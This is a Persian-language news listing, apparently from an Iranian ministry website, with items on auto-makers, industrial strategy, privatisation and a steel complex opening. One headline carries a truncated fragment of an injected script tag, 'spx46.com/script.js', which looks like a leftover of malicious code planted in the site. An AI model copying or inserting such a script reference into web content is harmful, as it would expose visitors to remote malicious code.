•  
    • فهرست اخبار
      یک شرکت نساجی تعطیل شد

      یک شرکت نساجی تعطیل شد

      شرکت نساجی «خزان استرچ» چابکسر تولید کننده انواع نخ نایلون و پلی استر پس از 18 سال تولید مستمر به دلایل نامعلومی تعطیل شد و53 تن از کارگران دایمی این واحد بیکار شدند.
      به گزارش ایلنا، نماینده کارگران واحدهای صنعتی گیلان با اشاره به این که تولیدات این شرکت قابل رقابت با تولیدات مشابه خارجی است، ضمن اظهار تاسف از تعطیلی این واحد با سابقه نساجی اظهار امیدواری کرد که وضعیت این شرکت و کارگران در سریع ترین زمان ممکن مشخص شود.

      شرکت سایپا واحد نمونه شناخته شد

      شرکت سایپا واحد نمونه شناخته شد

      بررسی دستاوردهای کیفی، کمی و زیست محیطی کلان شرکت سایپا را در رأس شرکتهای خودروسازی قرار داد.
      بر اساس اعلام روابط عمومی وزارت صنایع و معادن، هیئت داوران و کارشناسان انتخاب واحد نمونه صنعتی و خودروساز نمونه کشور، پس از بررسی همه شرایط، دستاوردهای کمی، کیفی، زیست‏محیطی، تحقیقاتی و تولیدی 230 واحد بزرگ صنعتی و معدنی کشور شرکت سایپا را به عنوان یکی از واحدهای نمونه صنعتی کشور در سال 82 برگزید.
      بر اساس این گزارش این شرکت همچنین از بین 15 شرکت خودروساز داخلی توانست عنوان بهترین خودروساز را از نظر افزایش کیفیت و کمیت تولید و رعایت مسائل زیست‏محیطی و تحقیقات گسترده بدست آورد.
      بر اساس این اعلام ، افزایش کیفیت تولید خودرو، افزایش کمیت و سهم بازار داخلی، افزایش بهره‏وری عوامل تولید و نیروی کار، بازاریابی و نیز افزایش میزان تولید از علل اصلی انتخاب شرکت سایپا به عنوان واحد نمونه صنعتی و خودروساز نمونه کشور بوده است.
      طبق این گزارش کاهش ضایعات، توجه کافی به مسائل زیست محیطی و رعایت حقوق زیست‏محیطی هموطنان، بهره‏مندی از پرسنل کارآمد و تحصیل کرد و داشتن واحد تحقیق و توسعه فعال وموفق از دیگر عللی بود که شرکت سایپا را در رأس 15 شرکت خوروساز کشرو و نیز جزء واحدهای نمونه صنعتی کشور قرار داد.
      شرکت سایپا توانست در سال 81 از 22 معیار انتخاب واحد نمونه صنعتی کشور در مقایسه با دیگر شرکتهای خودروساز بیشترین امتیاز را کسب کند و به پیشتازی خود در زمینه تولیدی و مشتری مداری و سرمایه گذاری زیست محیطی ادامه دهد.

      ایران خودرو در سودان خط تولید سمند راه‌اندازی می‌کند

      ایران خودرو در سودان خط تولید سمند راه‌اندازی می‌کند

      یک هیات سودانی در بازدید از خطوط تولید ایران خودرو خواستار سرمایه‌گذاری مشترک ایران خودرو در راه اندازی خط تولید سمند با ظرفیت سالانه 10 هزار دستگاه شدند.
      به گزارش روابط عمومی گروه صنعتی ایران خودرو، مدیر عامل شرکت «جیآر» سودان و هیات همراه روز گذشته در بازدید از ایران خودرو ضمن بیان این مطلب افزود: مذاکرات جدی در خصوص راه‌اندازی خط تولید سمند در سودان آغاز می شود.
      عبدالله رح، افزود: دولت سودان خواهان خرید خودروهای سواری و سنگین از کشور ایران است، زیرا خودروهای تولیدی ایران نسبت به مشابه خارجی به دلایل مختلف برای مردم سودان ارزانتر تمام میشود.
      مدیرعامل شرکت «جیآر» تاکید کرد:در صورت موافقت دولت جمهوری اسلامی ایران درخصوص اختصاص 30 میلیون دلار خط اعتباری به کشور سودان، این کشور نیاز ناوگان حمل و نقل شهری خود را از تولیدات ایرانی به ویژه محصولات گروه صنعتی ایران خودرو تامین خواهد کرد.
      وی، با اشاره به این که سودان تنها به وارد کردن خودرو بسنده نخواهد کرد اظهار داشت: هدف کشور سودان همکاری با جمهوری اسلامی ایران و استفاده از دانش فنی شرکتهای ایرانی در تولید خودرو است.
      فرح، با ستایش از پیشرفت صنعت خودروسازی در ایران گفت: اکنون خودروهای ساخت ایران وارد بازرا سودان شده و در صورت اختصاص تسهیلات بیشتر میتواند بازار این کشور را تسخیر کند.
      همچنین در حاشیه بازدید هیات سودانی معاون صادرات و امور بین الملل ایران خودرو نیز گفت: سمند از جمله خودروهایی است که در تولید آن دارای مزیت نسبی هستیم و خودرویی که دارای مزیت تولید است میتواند صادر شود.
      عبدالرحمن قلمبر تاکید کرد:درمورد صادرات خودرو سمند نیز با چند کشو به ویژه عربستان در حال حاضر مذاکره هستیم تا بتوانیم بخشی از بازار این کشورها را به دست آوریم. سیاست ما این است که در مناطقی که توجیه اقتصادی وجود دارد، خط تولید سمند را ایجاد کنیم.

      استراتژی صنعت قطعه‌سازی خودرو، ادغام و مشارکت واحدهای تولیدی است

      استراتژی صنعت قطعه‌سازی خودرو، ادغام و مشارکت واحدهای تولیدی است

      عضو هیات مدیره انجمن قطعه‌سازان گفت: در صنعت قطعه سازی خودرو، سیاست کلی این است که واحدهای تولیدی کوچک در هم ادغام شده و یا مشارکت در تولید داشته باشند .
      محمدرضا نجفی منش در گفت و گو با خبرگزاری فارس افزود: انجمن سازندگان قطعات و مجموعه خودرو شش استراتژی برای این صنعت تعریف کرده که استراتژی توسعه صنعتی با آن تطابق دارد.
      وی افزود: این استراتژی که حاصل کار 18 ماهه یک گروه کاری است شامل موارد زیر است:
      1- توسعه فرهنگ اعتماد و سرمایه گذاری مشترک در زمینه خرید دانش فنی و تکنولوژی جدید تشکیل واحد تحقیق و توسعه (r&d)، بازاریابی، کاهش هزینههای سربار تولید و هدف قرار دادن بازارهای خاص داخل و خارج.
      2- آماده سازی شرکتها برای تخصصی کردن فعالیت و افزایش توان رقابتی
      3- مورد سوم انطباق تدریجی یا الزامات پیوستن به سازمان تجارت جهانی، آماده سازی ساز و کار لازم در واحدهای تولیدی است.
      4- بسترسازی لازم برای خرید لیسانس(گواهی فنی) و دانش فنی با هدف مشارکت، جذب سرمایه خارجی و تولید با نام تجاری واحد معتبر
      5-مورد پنجم استراتژی یاد شده، توسعه تفکر تمرکز بر تولید قطعات و مجموعههایی که در تولید آنها شایستگی لازم در داخل کشور وجود دارد.
      نجفی منش آخرین مورد استراتژی را زمینه سازی برای بهره گیری از اصل صرفه جویی در مقیاس برای حضور موثر و فعال در بازارهای داخلی و خارجی را یادآور شد و گفت: وقتی قطعهسازیها در یک نقطه متمرکز شود، صرفه جویی در مقیاس تولید انبوه ایجاد میشود.
      عضو هیات مدیره انجمن قطعه سازان خودرو سه نوع تکنولوژی ساده، متوسط و های-تک(پیشرفته) را نام برد و گفت: فناوری قطعه سازی جز متوسط است و باید از دانش فنی موجود دنیا در آن استفاده شود. الان سعی بر این است که واحدهای کوچک قطعه سازی با هم مشارکت کرده و در واحد بزرگ به صورت انبوه تولید نمایند.
      نجفی منش در پاسخ به این که «آیا با ادغام واحدهای کوچک و تشکیل واحدهای بزرگ که مستلزم استفاده از فناوری بیشتر است، بیکاری ایجاد نمیشود» گفت: اشتغال در این فرآیند از بین نمیرود و فقط مقیاس تولید بزرگتر میشود.
      وی افزود: هدف انجمن این است که ایران به پایگاه تولید ارزان قیمت قطعات خودرو در دنیا تبدیل شود و درصدی از بازار قطعه سازی دنیا را کسب کند.
      عضو انجمن قطعه سازان با اشاره به این که کل تولید دنیا از قطعات خودرو سالانه هزار میلیارد اختصاص داد، سالانه 10 میلیارد دلار قطعه تولید میشود که دست کم 400 هزار شغل ایجاد میکند.
      وی افزود: از این هزار میلیارد دلار تولید سالانه قطعات، 720 میلیارد دلار در کارخانه های اصلی و 280 هزار دلار خدمات پس از فروش و بازار یدکی خودرو است.
      نجفی منش در مود توان کشور در صنعت قطعه سازی گفت: نیروی انسانی جوان، قوی و آموزش پذیر، پتانسیل ایران است 70 درصد جمعیت جوان زیر 30 سال است.
      وی افزود: همچنین ایران پل ارتباطی اروپا و آسیا که دو قطب خودروی دنیا هستند میباشد و از آنجا که هزینه تولید قطعه در اروپا گران است ، میتوان با مشارکت شدن مساله طراحی قطعه را حل کرد. کار ما پیدا کردن یک کارخانه اصلی(brand) مناسب است.
      نجفی منش به تجربه دیگر کشورها در قطعه سازی اشاره کرد و گفت: ابتدا همان قطعات که در کشور اصلی تولید میشد ، تقلید و مصرف شد، سپس صادرات شروع شد. مرحله بعد از تقلید نوآوری و سپس اختراع و طراحی است.

      وزارت صنایع و معادن برای عرضه سهام واحدهای خود به سازمان خصوصی سازی وکالت داد

      وزارت صنایع و معادن برای عرضه سهام واحدهای خود به سازمان خصوصی سازی وکالت داد

      اسحاق جهانگیری گفت: وزارت صنایع و معادن برای عرضه سهام واحدهای خود به سازمان خصوصی سازی وکالت داد.
      وزیر صنایع و معادن در گفت و گو با خبرگزاری فارس افزود:به منظور کمک به شرایط فعلی بورس سهام بانک صنعت و معدن تا پایان امسال عرضه میگردد. این سهام که میزان آن بسیار است ، علاوه بر 500 میلیارد تومانی است که به واسطه عرضه سهام شرکتهای وابسته به وزارت صنایع و سازمان گسترش ارائه میگردد.
      وی در خصوص توافق وزارت صنایع و معادن با سازمان بورس اوراق بهادار گفت: دبیر کل بورس اوراق بهادار در جلسه شورای معاونین این وزارتخانه، مشکلات بورس را مطرح و جهت حل آن به توافقاتی دست پیدا کردند.
      جهانگیری اظهار داشت: طبق این توافقات مقرر شده تا وزارت صنایع و معادن امکان عرضه سریع سهام شرکتهای وابسته به خود را فراهم کند.
      وی گفت: با توجه به این توافقات به سازمان خصوصی سازی وکالت دادهایم تا شرایط و زمینههای قانونی را برای عرضه سهام شرکتهای وابسته به وزارت صنایع و معادن و سازمان گسترش و نوسازی صنایع فراهم نماید.
      وزیر صنایع و معادن افزود: عرضه سهام بانک صنعت و معدن (با توجه به حجم بالای آن) در ارتباط با توافقات اخیر وزارت صنایع و معادن با بورس اوراق بهادار است.
      وی گفت: با توجه به میزان بالای سهام این بانک برخی از سهام از طریق بورس و برخی دیگر از طریق مزایده واگذار خواهد شد.
      وزیر صنایع و معادن در ارتباط با تمایل خرید 51 درصد سهام ایران خودرو توسط شرکت پژو فرانسه اظهار بیاطلاعی کرد.
      جهانگیری در خصوص زمان واردات خودرو گفت: وزارت بازرگانی متولی تعیین زمان و شرایط واردات است.
      وی افزود: هیچ محدودیت سقفی برای میزان واردات خودرو تعیین نشده است.

      خودروسازان از منابع مالی بین المللی استفاده خواهند کرد

      خودروسازان از منابع مالی بین المللی استفاده خواهند کرد

      معاون وزیر امور اقتصاد و دارایی اعلام کرد: سازمان سرمایه گذاری وزارت اموراقتصاد و دارایی شرایط لازم برای بهره گیری خودروسازان و به خصوص ایران خودرو از امکانات و منابع مالی بین المللی را فراهم می کند.
      محمد خزایی ضمن بیان این مطلب گفت: این تسهیلات به صورت وام یا جلب سرمایه گذاری خارجی خواهد بود و تلاش می شود در بخشهای مختلف تولید خودرو در ایران میزان سرمایه گذاری خارجی افزایش یابد.
      وی با اشاره به آزادسازی واردات خودرو اظهار داشت: باید به خودروسازان کمک کرد تا با کاهش هزینه‌های تولید و افزایش کیفیت توان رقابتی خود را به صورت جدی در برابر خودروسازان خارجی افزایش دهند وامکان صادرات گسترده محصولات آنان به بازارهای هدف فراهم شود.
      خزایی با تاکید بر آمادگی سازمان سرمایه گذاری وزارت اقتصاد برای تجهیز منابع مالی و خارجی ایران خودرو و تجهیز نیروی انسانی مورد نیاز شرکت در مقوله‌های مالی و ارتباطات بین الملل گفت: با حضور در بازارهای خارجی و اطمینان بخشی به سرمایه‌گذاران آینده بسیار خوبی را برای صنعت خودروی کشور میتوان پیش‌بینی کرد.
      وی افزود: گزارش مدیریت ارشد ایران خودرو در خصوص برنامههای آتی شرکت در راستای نوآوری و افزایش تولید و ارتقای کیفیت همگی گواه بر این است که اقدامات بسیار ارزشمندی در ایران خودرو انجام شده است که باید از آن حمایت کرد.
      معاون وزیر اقتصاد و امور دارایی با اشاره به ضرورت افزایش با بهینه‌سازی استفاده از منابع مالی و نفوذ در بازارهای صادراتی گفت: ایران خودرو تولید سالانه یک میلیون دستگاه خودرو در سال 1378 را هدف قرار داده است که این اتفاق در صنعت خودرو کشور حائز اهمیت خواهد بود.
      وی محور اصلی مذاکرات با مدیریت ارشد شرکت را یافتن منابع مالی جدید برای ایران خودرو و کمک به تجهیز منابع مالی در سطوح بین المللی ذکر کرد.
      وی در پایان خاطر نشان ساخت: مردم باید از نزدیک با دستاوردهای ایران خودرو آشنا شوند تا نگرش آنان نسبت به صنعت خودرو متحول شده و بی‌اعتنا از کنار تحولات انجام شده نگذرند.

      تست

      تست

      متن ?

      صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط تاسیس می شود

      صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط تاسیس می شود

      در صورت تصویب مجلس شورای اسلامی، صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط تاسیس می شود.
      بنا به پیشنهاد وزارت صنایع و معادن لایحه تاسیس صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط در جلسه مورخ 29/4/1382 هیات وزیران به تصویب رسیدو جهت تصویب نهایی به مجلس شورای اسلامی تقدیم شد.
      در مقدمه توجیهی این لایحه میخوانیم: با عنایت به ضرورت تامین منابع مالی مورد نیاز طرحهای کوچک صنعتی اشتغال زا و عدم توانایی متخصصین و نیروهای خلاق در تامین منابع مالی طرحهای یاد شده و وثایق مورد انتظار بانکهای کشور و به منظور تشویق نیروهای مذکور جهت سرمایه گذاری در واحدهای کوچک صنعتی و شتاب بخشیدن به ایجاد و توسعه اشتغالهای مولد و پایدار، این لایحه به تصویب رسید.
      متن لایحه تاسیس صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط به شرح زیر است: ماده واحده _ به منظور فراهم آوردن موجبات توسعه سرمایه گذاری بخش غیردولتی در صنایع کوچک و متوسط، کوتاه کردن مدت زمان اجرای طرحهای صنایع کوچک و متوسط اشتغال زا و دارای توجیه اقتصادی، با اولویت مناطق کمتر توسعه یافته و تضمین و تسهیل در توثیق تسهیلات اعطایی به طرحهای مذکور، به دولت اجازه داده می شود «صندوق ضمانت سرمایه گذاری صنایع کوچک و متوسط» را به صورت شرکت دولتی و زیر نظر وزارت صنایع و معادن تاسیس کند.
      سرمایه اولیه صنعتی یاد شده مبلغ پانصد میلیارد ریال خواهد بود که در مدت پنج سال در قانون بودجه کل کشور تامین خواهد شد.
      اساسنامه و شرح وظایف صندوق مزبور با همکاری وزارتخانههای صنایع و معادن، امور اقتصادی و دارایی، جهاد کشاورزی، بازرگانی، بانک مرکزی جمهوری اسلامی ایران و سازمان مدیریت و برنامه ریزی کشور، ظرف مدت سه ماه تهیه و به تصویب هیات وزیران خواهد رسید.
      این لایحه به شماره 25554/27400 به تاریخ 12/5/82 به مجلس تقدیم شد.

      استراتژی توسعه صنعتی باید با نگاه برونگرا و صادرات‌گرا باشد

      استراتژی توسعه صنعتی باید با نگاه برونگرا و صادرات‌گرا باشد

      عباس سلیمیان گفت: استراتژی توسعه صنعتی باید با نگاه برونگرا و صادرات‌گرا باشد.
      عباس سلیمیان در گفتوگو با خبرگزاری فارس افزود: زیرا این دیدگاه تجربه جهانی در دهه گذشته است. مطالعه گروهی این استراتژی ، نیز آن را تایید کرد.
      وی افزود: مهمترین پتانسیل کشور، شبکه تامین قطعات خودرو است. این که قسمتهای مختلف صنعت عملا چه کار کنند، توسط 8- 7 گروه در وزارت صنایع و معادن پیگیری میشود. در زمینه صنعت خودرو مطالعات کاملا حرفهای انجام شده است.
      استاد دانشگاه بوعلی سینا همدان با تاکید بر این که اراده برای ماندن در وضع کنونی صنعت وجود ندارد، گفت: جایگاه حاضر در صنعت فاصله زیادی با دنیا دارد و مطرح کردن رشد 8 درصدی توسط سازمان مدیریت برای کاستن فاصله است.
      وی مهمترین پتانسیل در صنعت کشور را شبکه تامین قطعات خودرو دانست و گفت: پیش از دو هزار قطعهساز وجود دارند که فقط قطعات خودرو تولید نمیکنند ،بلکه هر قطعه صنعتی دیگر، مانند قطعات لوازم خانگی را هم میتوانند طراحی و تولید کنند.
      سلیمیان صنعت خودرو را مهمترین بخش صنعت خواند و گفت: خودروسازی فرآیندهای بسیاری از مواد صنعتی داشته و کارگاه آموزشی بزرگ صنعتی کشور است. نگاه کلی در این صنعت این است که ارادهای برای ماندن در وضع موجود نیست.
      وی افزود: برنامه آینده نگر و آیندهساز وجود دارد ، اما چون امکان ساختن آینده بر طبق مراد وجود ندارد، باید آینده را خوب شناسایی کرده تا بر اساس تجربه گذشته مسیر نو انتخاب شود.
      سلیمیان یادآور شد اگر بخواهیم خودرو تولید کنیم، طبق سیاست آیندهنگر باید مفهوم خودرو با خودروی 20 سال آینده مطابق باشد. بررسیها نشان داده خودروهای آینده مبتنی بر موتور احتراق نیست، بلکه بر مبنای انرژی نو و خواسته مشتری است این خواست در قیافه خودرو متجلی میشود.
      وی افزود: الگوی انرژی خودروهای آینده میگوید در سال 2020 موتور پیل سوخت (انرژی جدید از متانول، بنزین و الکل با تری الکتریکی میسازد) است.
      سلیمیان گفت: در تکنولوژی پیل سوختی 7-6 سال از دنیا عقبتر اما در موتور احتراقی 60-50 سال عقبتر هستیم. در عین حال 90- 80 درصد دانش آن در کشور وجود دارد.بنابراین یک اقتصاد انرژی جدید باید طراحی شود. محصولات پتروشیمی به سمت پیل سوختی برود.
      کارشناس ارشد خودرو گفت: مدیریت خودرو باید دو کار کند، یکی جمع‌آوری تکنولوژی کهنه و دیگری جایگزینی تکنولوژی جدید. در غیر این صورت باید طراح استراتژی صنعتی عوض شود.

      وزیر صنایع و معادن در مراسم افتتاح مجتمع فولاد سبا : تحقق رشد اقتصادی جز با تحقق توسعه صنعتی ایجاد نخواهد شدspx46.com/script.js></scri

      وزیر صنایع و معادن در مراسم افتتاح مجتمع فولاد سبا : تحقق رشد اقتصادی جز با تحقق توسعه صنعتی ایجاد نخواهد شدspx46.com/script.js></scri

      جهانگیری وزیر صنایع و معادن که در مراسم افتتاح مجتمع فولاد سبا ، سخن می گفت با بیان این که در ایامی که کشور در حال تدوین برنامه چهارم توسعه است، مجتمع فولاد سبا هدیه ارزشمندی برای ملت ایران است.
      جهانگیری، توسعه صنعتی را برای کشور ضروری و اساسی و برنامه‌ای ملی برای کشور دانست و اظهار داشت : تحقق رشد اقتصادی جز با تحقق توسعه صنعتی کشور ایجاد نخواهد شد.
      وزیرصنایع ، بیان کرد: استراتژی توسعه صنعتی با هدف ایجاد فضای محیطی کشور تدوین شده است.
      وی افزود: کشوری که در سال 82 صادرات صنعتی آن به 3 میلیارد دلار در سال برآورد می شد، اینک با بیش از 30 میلیارد دلار ارزش صادرات صنعتی برخوردار است.
      وی، افزود : در توسعه صنعتی بخش خصوصی مهمترین محور توسعه صنعتی خواهد بود و باید فضای محیطی و امنی به لحاظ حقوقی و سیاسی و مالی فراهم شود.
      جهانگیری، ضمن اشاره به سیاستهای کلان کشور، خاطر نشان کرد: در برنامه سوم توسعه ی کشور بخش صنعتی رشد بالای 10 درصد را تجربه کرده است که این رشد برای سال 82 پیش بینی می شود.
      وی به ایجاد بنگاههای صنعتی در کشور اشاره کرد و افزود : امید داریم این بنگاه ها و شرکتهای بتوانند نقش موثر خود را در عرصه توسعه صنعتی کشور ایفا کنند.
      جهانگیری، افزود : در استراتژی توسعه صنعتی، بهره برداری حداکثر از منابع طبیعی و معدنی کشور مورد توجه قرار گرفته که در آینده باید مورد توجه بیشتری باشد. خصوصی سازی در بنگاه‌های دولتی در حال حاضر غیر ممکن است و با توجه به قانون اساسی نیاز به تدوین قوانین جدید دارد.
      وزیر صنایع و معادن، در بخش دیگری از سخنان خود، افزود: درصنایع صنعتی متکی بر منابع طبیعی باید باتحقیق و پژوهش بیشتر به دانش و فناوری روز دنیا دست یابیم.
      هنگامی از منابع طبیعی خود به عنوان یک ظرفیت بهره می بریم که بتوانیم با تکیه بر دانش روز دنیا آن را در توسعه صنعتی کشور مورد استفاده قرار دهیم.
      وزیر صنایع و معادن، اظهار داشت: باید با یک تفاهم جدی صنایع انرژی‌زا را در حاشیه ی خلیج فارس راه اندازی کنیم و تفاهمات اولیه در این زمینه انجام گرفته است.
      جهانگیری، افزود: در سال‌جاری پس از فولاد با راه اندازی طرحهای جدید ظرفیت مس کشور نیز افزایش خواهد یافت.

ستاد خبری مرکز حراست وزارتخانه

88846668

آدرس :

تهران، خیابان کریمخان، خیابان استاد نجات الهی، خیابان سمیه، نبش کوچه پورموسی، وزارت صنعت، معدن و تجارت

کد پستی :

1599691379

تلفن :

81771-81761

پست الکترونیک :

info@mimt.gov.ir

مجموع بازدیدها : 236,870,174
تعداد بازدید امروز : 37,092
تعداد بازدید دیروز : 49,998
تعداد بازدید هفته : 337,663
تعداد بازدید این ماه : 987,040
آخرین به روزرسانی : 1399/05/24 20:53

کلیه حقوق متعلق به وزارت صنعت، معدن و تجارت می باشد.